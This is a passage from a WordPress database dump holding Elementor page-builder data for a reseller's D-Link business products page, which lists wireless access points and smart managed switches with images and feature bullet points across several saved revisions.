uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a2dc1a5\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28X-510x600.jpg\",\"id\":2649}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"82006f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(7233,3362,'_elementor_version','2.5.14'),(7234,3362,'_elementor_edit_mode','builder'),(7237,3363,'_wp_page_template','template-fullwidth.php'),(7238,3363,'_elementor_template_type','post'),(7239,3363,'_elementor_data','[{\"id\":\"1f43283\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"26b7848\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3963540\",\"elType\":\"widget\",\"settings\":{\"title\":\"D - Link Business Solution Product \",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"01972e4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d52d974\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cee2f63\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f179b24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6dd0023\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2445e57\",\"elType\":\"widget\",\"settings\":{\"title\":\"Business Wireless\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"87263a7\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"670851a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":49},\"elements\":[{\"id\":\"8492236\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wave 2 Dual\\u2011Band WI-FI PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"46550cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2680-features3.png\",\"id\":2359}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"d3dd31e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>MU-MIMO with beamforming<\\/p><p>Band steering<\\/p><p>Gigabit PoE-capable LAN port<\\/p><p>AP Array utility support<\\/p><p>Free D-Link Central WiFiManager<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ed243d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"149\",\"right\":\"149\",\"bottom\":\"149\",\"left\":\"149\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e4eb9a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"50\",\"bottom\":\"50\",\"left\":\"50\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2bd1d30\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"5df83e1\",\"elType\":\"widget\",\"settings\":{\"title\":\"2.4GHz Wireless N300 Outdoor Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9d80101\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-3310-front-510x600.jpg\",\"id\":2360}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"47bee85\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through<\\/p><p>Two 10\\/100 Ethernet ports (one supporting PoE) allow for further physical expansion<\\/p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage<\\/p><p>Weather-proof design (IPX6) built to withstand harsh environments<\\/p><p>Supports multiple operation modes \\u2013 AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater<\\/p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic<\\/p><p>Provides WLAN partitioning for deployments such as wireless hot spots<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"db46566\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"864ef7a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"921801b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":19},\"elements\":[{\"id\":\"3587cd7\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8c43c0a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600.png\",\"id\":2361},\"image_size\":\"full\",\"image_custom_dimension\":{\"width\":\"1000\",\"height\":\"1000\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"176122c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards<\\/p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 Mbps\\u00a0 Over 5 GHz band<\\/p><p>Support load balancing to ensure maximum performance by limiting user\\u00a0 per AP<\\/p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications<\\/p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHz\\u00a0 or 5 GHz band<\\/p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet<\\/p><p>Support multiple operation \\u2013 AP, WDS with AP, WDS\\/Bridge and Client<\\/p><p>Rugged\\u00a0 metal housing &amp;\\u00a0 Plenum-rated chassis<\\/p><p>Built in Radius Server\\u00a0 allowing users to create their accounts within the device itself.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b8d278c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c3cde4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6c2ecda\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":21},\"elements\":[{\"id\":\"2ae7a13\",\"elType\":\"widget\",\"settings\":{\"title\":\"N600 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f2d465f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage-510x600.png\",\"id\":2362}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9584be6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>\\u2022 MU-MIMO with beamforming<\\/p><p>\\u2022 Band steering<\\/p><p>\\u2022 Gigabit PoE-capable LAN port<\\/p><p>\\u2022 AP Array utility support<\\/p><p>\\u2022 Free D-Link Central WiFiManager<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6a7db1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abb1d39\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1300 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6918a41\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DAP-2610-featured-510x600.jpg\",\"id\":2363}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5a1076c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Enjoy High-performance Wireless Connectivity<\\/p><p>\\u2013 Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications<\\/p><p>MU-MIMO with Beamforming<\\/p><p>\\u2013 Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network<\\/p><p>Multiple Operational Modes<\\/p><p>-Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c4fc3d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":28},\"elements\":[{\"id\":\"6b87f5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"N300 Wireless PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3531775\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2330-front-510x600.jpg\",\"id\":2364}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9952c2a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 High-speed wireless performance with 300 Mbps wireless signal rates<\\/p><p>\\u2022 Support Wi-fi Multimedia\\u2122 (WMM) for audio, video, and voice applications<\\/p><p>\\u2022 Gigabit Ethernet port with 802.3af Power over Ethernet<\\/p><p>\\u2022 Multiple operation modes: AP, WDS with AP, WDS\\/Bridgeanf Client<\\/p><p>\\u2022 Support Inbuilt Radius server, Network Access protection (NAP)<\\/p><p>\\u2022 Equipped with 8 VLANs per band for multiple SSIDs\\u00a0 Implementation<\\/p><p>\\u2022 Support Central WiFi Manager to configure and manage multiple AP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e416cd6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"047b1be\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0912f1d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Smart Switch\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f63ab97\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"8bfc0eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"65e965e\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"617e48f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2642}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5cada50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T\\/SFP+ Combo Slots<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1528409\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ce451cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b182397\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2643}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"90f4e95\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G SFP+, Two 10 Gigabit Base-T \\/SFP+ Combo Ports<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2887756\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7526ebb\",\"elType\":\"widget\",\"settings\":{\"title\":\"26-Port Layer 2 Lite Smart Managed Gigabit Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bf0db0d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1100-26-front-510x600-510x600.jpg\",\"id\":2654}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b0830af\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Port 10\\/100\\/1000 Base-T with 2 Gigabit SFP Ports<br \\/>\\u2022 Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6377d4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"68b593a\",\"elType\":\"widget\",\"settings\":{\"title\":\"10 Gigabit Ethernet Smart Managed Switches\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"659046d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600-1.png\",\"id\":2645}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b9868b3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>10 Gigabit Ethernet Connection<\\/p><p>Improved Power Efficiency<\\/p><p>Smart and Flexible Management<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9040bdd\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"3a1bef1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":29},\"elements\":[{\"id\":\"46339e5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 2 Smart Managed Gigabit PoE Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5f3d924\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\",\"id\":2646}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5759169\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T PoE + 4 slots for Gigabit SFP<br \\/>\\u2022 Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br \\/>\\u2022 Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Access Control List (ACL) feature to enhances network security<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"30bbd67\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"cdf28d5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"db53704\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DES-1510-52-510x600.jpg\",\"id\":2647}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"37182c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Built-in SNMP MIB for remote Network\\u00a0Management Systems<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"38f0a9a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4be48a8\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3f346e9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\",\"id\":2648}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"052fb2e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Support IEEE 802.3af (PoE) and 802.3at (PoE+) \\u00a0with Power Budget of 370W<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"17edb25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"98c3571\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a2dc1a5\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28X-510x600.jpg\",\"id\":2649}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"82006f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(7240,3363,'_elementor_version','2.5.14'),(7241,3363,'_elementor_edit_mode','builder'),(7244,3364,'_wp_page_template','template-fullwidth.php'),(7245,3364,'_elementor_template_type','post'),(7246,3364,'_elementor_data','[{\"id\":\"1f43283\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"26b7848\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3963540\",\"elType\":\"widget\",\"settings\":{\"title\":\"D - Link Business Solution Product \",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"01972e4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d52d974\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cee2f63\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f179b24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6dd0023\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2445e57\",\"elType\":\"widget\",\"settings\":{\"title\":\"Business 